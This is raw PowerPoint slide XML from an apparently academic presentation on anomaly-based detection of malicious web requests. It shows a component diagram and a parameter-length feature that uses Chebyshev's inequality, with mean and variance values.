        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1844825"/>
            <a:ext cx="1584176" cy="72008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/>
              <a:t>Request</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Validator</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Łącznik prosty ze strzałką 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771800" y="2204865"/>
            <a:ext cx="2160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stCxn id="10" idx="3"/>
            <a:endCxn id="14" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4211960" y="2204865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14" idx="3"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156176" y="2204865"/>
            <a:ext cx="4320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>
            <a:stCxn id="11" idx="3"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7812360" y="2204865"/>
            <a:ext cx="2160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chemat blokowy: proces 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779912" y="3212977"/>
            <a:ext cx="1584176" cy="72008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Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Validator</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Schemat blokowy: proces 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580112" y="3212977"/>
            <a:ext cx="1584176" cy="72008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Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Collector</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Schemat blokowy: proces 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4293097"/>
            <a:ext cx="1584176" cy="72008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Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Decryptor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" smtClean="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Encryptor</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Puszka 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4932040" y="5301209"/>
            <a:ext cx="864096" cy="1080120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/>
              <a:t>Req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Store</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Gwiazda 7-ramienna 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802025" y="4257093"/>
            <a:ext cx="720080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Gwiazda 7-ramienna 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054053" y="4473117"/>
            <a:ext cx="720080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Gwiazda 7-ramienna 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352301" y="4689141"/>
            <a:ext cx="720080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chemat blokowy: proces 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771800" y="4293097"/>
            <a:ext cx="1584176" cy="72008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Model Generator</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1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94981" y="5656603"/>
            <a:ext cx="1238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/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Models</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Łącznik prosty ze strzałką 23"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="31" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="5013177"/>
            <a:ext cx="0" cy="28803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stCxn id="31" idx="1"/>
            <a:endCxn id="36" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4355976" y="4653137"/>
            <a:ext cx="2160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>
            <a:stCxn id="36" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2159732" y="4653137"/>
            <a:ext cx="61206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łamany 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="2"/>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5688124" y="3609021"/>
            <a:ext cx="360040" cy="1008112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V="1">
            <a:off x="4788024" y="2564906"/>
            <a:ext cx="0" cy="64807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>
            <a:off x="5940152" y="2564905"/>
            <a:ext cx="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łamany 49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="0"/>
            <a:endCxn id="29" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2368084" y="2629242"/>
            <a:ext cx="468052" cy="2355603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8" idx="3"/>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="2204865"/>
            <a:ext cx="4320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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="1373293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Server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52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Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Values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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> as cross-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>contain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>long</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>sequences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might</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>significantly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>exceede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r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characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>, and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feature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> for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easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>. 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81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>
                <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>Chebyshev's</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>inequality</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>:</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" i="1" dirty="0" smtClean="0">
                    <a:latin typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL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l-PL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pl-P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pl-PL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pl-PL" b="0" i="1" smtClean="0">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t> 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l-PL" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>≤ </m:t>
                    </m:r>
                    <m:f>
                      <m:fPr>
                        <m:ctrlPr>
                          <a:rPr lang="pl-PL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𝑣𝑎𝑟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pl-PL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pl-PL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pl-PL" b="0" i="1" dirty="0" smtClean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pl-PL" dirty="0" smtClean="0"/>
                  <a:t>	</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>where</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL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pl-PL" dirty="0" smtClean="0"/>
                  <a:t>	E(x) – </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>expected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value</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> of x</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>	</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>var</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>(x) – </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>variance</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> of x</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="457200" lvl="1" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pl-PL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&gt;0 </m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>If</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>:</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                </a:b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𝑙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l-PL" dirty="0" smtClean="0"/>
                  <a:t>(</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>length</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>parameter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value</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>)</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                </a:b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≡ </m:t>
                    </m:r>
                    <m:d>
                      <m:dPr>
                        <m:begChr m:val="|"/>
                        <m:endChr m:val="|"/>
                        <m:ctrlPr>
                          <a:rPr lang="pl-PL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pl-PL" b="0" i="1" baseline="-25000" smtClean="0">
                            <a:latin typeface="Cambria Math"/>
                            <a:ea typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝑜𝑏𝑠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pl-PL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</m:d>
                      </m:e>
                    </m:d>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0">
                    <a:ea typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0">
                    <a:ea typeface="Cambria Math"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pl-PL" b="0" dirty="0" smtClean="0">
                    <a:ea typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t>	</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>where</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>: </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>	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  <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝑙</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1" baseline="-25000">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝑜𝑏𝑠</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> – </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>currently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observed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parameter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value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length</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>We </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>obtain</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>:</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                </a:b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l-PL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/>
                              </a:rPr>
                              <m:t>𝑙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𝐸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𝑙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pl-PL" i="1">
                            <a:latin typeface="Cambria Math"/>
                            <a:ea typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>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pl-PL" i="1" baseline="-25000">
                                <a:latin typeface="Cambria Math"/>
                                <a:ea typeface="Cambria Math"/>
                              </a:rPr>
                              <m:t>𝑜𝑏𝑠</m:t>
                            </m:r>
                            <m:r>
                              <a:rPr lang="pl-PL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pl-PL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𝑣𝑎𝑟</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL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pl-PL" i="1">
                            <a:latin typeface="Cambria Math"/>
                            <a:ea typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>) </m:t>
                        </m:r>
                      </m:num>
                      <m:den>
                        <m:sSup>
                          <m:sSupPr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l-PL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pl-PL" i="1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  <m:r>
                                  <a:rPr lang="pl-PL" i="1" baseline="-25000">
                                    <a:latin typeface="Cambria Math"/>
                                    <a:ea typeface="Cambria Math"/>
                                  </a:rPr>
                                  <m:t>𝑜𝑏𝑠</m:t>
                                </m:r>
                                <m:r>
                                  <a:rPr lang="pl-PL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pl-PL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pl-PL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pl-PL" i="1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  <m:r>
                                  <a:rPr lang="pl-PL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l-PL" i="1">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>≝</m:t>
                    </m:r>
                    <m:acc>
                      <m:accPr>
                        <m:chr m:val="̃"/>
                        <m:ctrlPr>
                          <a:rPr lang="pl-PL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acc>
                    <m:r>
                      <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t> (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𝑙</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1" baseline="-25000">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝑜𝑏𝑠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37" t="-2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ostokąt 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038725" y="5029200"/>
            <a:ext cx="3228976" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="6F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Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>arameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>alues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63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Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Values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016358"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467544" y="1484783"/>
          <a:ext cx="3927547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634301"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4644008" y="1484784"/>
          <a:ext cx="4034377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013300"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467544" y="4005064"/>
          <a:ext cx="4034999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Wykres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660506"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4644008" y="4005064"/>
          <a:ext cx="399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3334365" y="2362200"/>
            <a:ext cx="113781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l-PL" sz="1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E(l)=15.06</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="14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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1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(l)= 5.99</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="14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452320" y="2204864"/>
            <a:ext cx="113781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pl-PL"/>
            </a:defPPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0">
                <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E(l)=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>14.97</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1400" dirty="0">
              <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" err="1">
                <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0">
                <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(l)= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>6.25</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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4979" y="4725144"/>
            <a:ext cx="123719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pl-PL"/>
            </a:defPPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0">
                <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E(l)=15.15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" err="1">
                <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0">
                <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(l)= 13.02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229901" y="4724968"/>
            <a:ext cx="13365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pl-PL"/>
            </a:defPPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0">
                <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E(l)=17.71</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" err="1">
                <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0">
                <a:latin typeface="Cambria Math" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(l)= 124.66</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16923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Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
